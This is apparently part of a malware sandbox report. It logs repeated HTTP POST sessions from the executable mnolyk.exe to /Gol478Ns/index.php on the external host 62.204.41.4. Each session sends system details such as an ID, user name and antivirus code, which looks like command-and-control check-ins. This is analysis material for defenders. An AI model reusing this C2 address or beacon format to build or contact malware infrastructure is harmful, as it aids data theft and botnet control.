                            Feb 8, 2023 17:39:36.727771997 CET | 659 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:36.791326046 CET | 659 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            471 | 192.168.2.4 | 50166 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:36.964835882 CET | 660 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:37.028923035 CET | 660 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            472 | 192.168.2.4 | 50167 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:37.216090918 CET | 661 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:37.280250072 CET | 661 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            473 | 192.168.2.4 | 50168 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:37.476154089 CET | 662 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:37.541282892 CET | 662 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            474 | 192.168.2.4 | 50169 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:37.723515034 CET | 663 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:37.787247896 CET | 663 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            475 | 192.168.2.4 | 50170 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:37.964961052 CET | 664 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:38.027384996 CET | 664 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            476 | 192.168.2.4 | 50171 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:38.199717999 CET | 665 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:38.264652014 CET | 665 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            477 | 192.168.2.4 | 50172 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:38.433748960 CET | 665 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:38.497771978 CET | 666 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            478 | 192.168.2.4 | 50173 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:38.673124075 CET | 666 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:38.736965895 CET | 667 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            479 | 192.168.2.4 | 50174 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:38.936331034 CET | 667 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:38.999413967 CET | 668 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            48 | 192.168.2.4 | 49743 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:38.542907953 CET | 237 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:38.607089996 CET | 237 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            480 | 192.168.2.4 | 50175 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:39.452531099 CET | 668 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:39.517776012 CET | 669 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            481 | 192.168.2.4 | 50176 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:39.790671110 CET | 669 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:39.855304956 CET | 670 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            482 | 192.168.2.4 | 50177 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:40.085026979 CET | 670 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:40.152656078 CET | 671 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            483 | 192.168.2.4 | 50178 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:40.855897903 CET | 671 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:40.917797089 CET | 672 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            484 | 192.168.2.4 | 50179 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:41.189675093 CET | 672 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:41.253341913 CET | 673 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            485 | 192.168.2.4 | 50180 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:42.064683914 CET | 673 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:42.130455017 CET | 674 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            486 | 192.168.2.4 | 50181 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:42.912009001 CET | 674 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:42.977669001 CET | 675 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            487 | 192.168.2.4 | 50182 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:43.165436029 CET | 675 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:43.227242947 CET | 676 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            488 | 192.168.2.4 | 50183 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:43.402506113 CET | 676 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:43.466197968 CET | 677 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            489 | 192.168.2.4 | 50184 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:43.643716097 CET | 677 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
